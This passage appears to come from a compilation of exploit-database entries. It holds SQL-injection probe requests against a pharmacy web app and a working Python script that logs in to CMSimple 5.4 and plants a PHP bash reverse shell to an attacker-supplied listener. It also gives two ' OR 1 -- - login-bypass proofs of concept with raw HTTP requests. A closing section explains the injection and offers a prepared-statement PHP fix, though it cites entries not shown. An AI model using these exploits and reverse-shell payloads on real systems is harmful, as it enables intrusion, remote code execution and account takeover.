==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1
==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true
==> /pharmacy/manage_product.php?id=-1'

==> POST /pharmacy/Actions.php?a=save_stock

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"


------------YWJkMTQzNDcw
Content-Disposition: form-data; name="supplier_id"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="product_id"

2'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="quantity"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="expiry_date"


==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"

5'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="product_code"

94102'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="category_id"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="name"

pHqghUme'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="description"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="status"

0'"
------------YWJkMTQzNDcw--
-
Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 29.09.2021
# Exploit Author: pussycat0x
# Vendor Homepage: https://www.cmsimple.org/
# Version: 5.4
# Tested on: ubuntu-20.04.1

import argparse
from bs4 import BeautifulSoup
from argparse import ArgumentParser
import requests

parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport')
rparser = parser.add_argument_group('required argument')
rparser.add_argument('-url','--host', type=str, help='target domain',required=True)
rparser.add_argument('-u' ,'--username', type=str, help='', required=True)
rparser.add_argument('-p','--password',type=str,help='', required=True)
rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True)
rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True)
args= parser.parse_args()
#url ='192.168.1.106'
s = requests.Session()

def main():
    try:
        url =(args.host)
        payload = {
            'user':args.username,
            'passwd':args.password,
            'submit': 'Login',
            'login':'true',
        }
        login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload)
        if login.status_code == 200:
            print('Exploit Completed')
        else:
            print("Invalid Credential")
        cook =(login.cookies.get_dict())
        temp = s.get(url +'/?file=template&action=edit', cookies=cook)
        soup = BeautifulSoup(temp.text, 'lxml')
        csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value']
        #<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
        rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"""
        rev2=(args.lhost)
        rev3=(args.lport)
        rev4=""" 0>&1'");"""
        php =(rev+rev2+'/'+rev3+rev4)
        revpayload = {
            'cmsimpleDataFileStored':'cmsimpleDataFileStored',
            'csrf_token':csrfToken,
            'text':php,
            'file':'template',
            'action':'save',
        }
        shell = s.post(url +'/',cookies=cook , data=revpayload)
        exec = s.get(url+'/')
        exit()
    except:
        pass

main()
-
Blood Bank System 1.0 - Authentication Bypass
# Exploit Title: Blood Bank System 1.0 - Authentication Bypass
# Date: 30-9-2021
# Exploit Author: Nitin Sharma (vidvansh)
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/
# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230
# Version: 1.0
# Tested on: Windows 10 , Apache , Mysql
# Description : The password input is vulnerable to authentication bypass because of improper sanitisation, which leads to access to unauthorised accounts.

#Steps-To-Reproduce:
Step 1 – Go to the product admin panel http://localhost/bloodbank/login.php.
Step 2 – Enter anything in username and password.
Step 3 – Click on Login and capture the request in Burp Suite.
Step 4 – Change the username to ' OR 1 -- - and the password to ' OR 1 -- -.
Step 5 – Click forward and you will now be logged in as admin.

# PoC:

GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

# Authentication Bypass:
# Go to the admin login page (http://localhost/bloodbank/login.php), then use the payload below as username and password =>

Username: ** Random email **
Password: ' or 1 -- -
-
Exam Form Submission System 1.0 - SQL Injection Authentication Bypass
# Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass
# Date: 30-09-2021
# Exploit Author: Nitin Sharma (Vidvansh)
# Vendor Homepage: https://code-projects.org
# Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/
# Version: 1.0
# Tested on: XAMPP / Windows 10

Steps-To-Reproduce:
Step 1 – Go to the product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php.
Step 2 – Enter anything in username and password.
Step 3 – Click on Login and capture the request in Burp Suite.
Step 4 – Change the username to ' OR 1 -- - and the password to ' OR 1 -- -.
Step 5 – Click forward and you will now be logged in as admin.

POC

POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login
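The CCMS, Blood Bank and Exam Form entries above (and the login step of the Storage Unit exploit) are the same defect: the submitted username and password are concatenated into the SQL string, so the value `' OR 1 -- -` closes the quoted literal, makes the WHERE clause always true and comments out the rest of the query. The following is an added example written for this page, not code from any of those projects; the table and column names and the mysqli connection are assumptions. It places that query beside a prepared-statement version that also stops storing plaintext passwords.

```php
<?php
// Added example: the concatenated login query beside a parameterized one.
// Table/column names are assumed; this is not any of the projects' code.

// Vulnerable pattern. With username = ' OR 1 -- -  the query becomes
//   SELECT * FROM admin WHERE username='' OR 1 -- -' AND password='...'
// which matches every row, so the first user (typically admin) is returned.
function vulnerableLogin(mysqli $db, string $username, string $password): ?array
{
    $sql = "SELECT * FROM admin WHERE username='" . $username . "' AND password='" . $password . "'";
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// Hardened pattern:
//  - the username is bound as a parameter, so quotes and comment sequences
//    reach the database as data, never as SQL syntax;
//  - the password is not compared in SQL at all: the stored bcrypt hash is
//    fetched and checked with password_verify();
//  - a dummy hash is verified when the user does not exist, so the failure
//    path costs about the same time either way.
function secureLogin(mysqli $db, string $username, string $password): ?array
{
    static $dummyHash = null;
    if ($dummyHash === null) {
        $dummyHash = password_hash('not-a-real-password', PASSWORD_DEFAULT);
    }

    $stmt = $db->prepare('SELECT id, username, password_hash FROM admin WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    $hash = $row['password_hash'] ?? $dummyHash;
    if ($row === null || !password_verify($password, $hash)) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

// Usage in the login handler (assumed field names match the advisories' forms):
//   $user = secureLogin($db, (string) ($_POST['username'] ?? ''), (string) ($_POST['password'] ?? ''));
//   if ($user === null) { http_response_code(401); exit('Invalid login'); }
//   session_regenerate_id(true);   // new session id on privilege change
//   $_SESSION['admin_id'] = $user['id'];
```

Existing plaintext passwords are migrated by hashing them once with `password_hash()` and dropping the old column; after that the injected `' OR 1 -- -` is simply a username that does not exist.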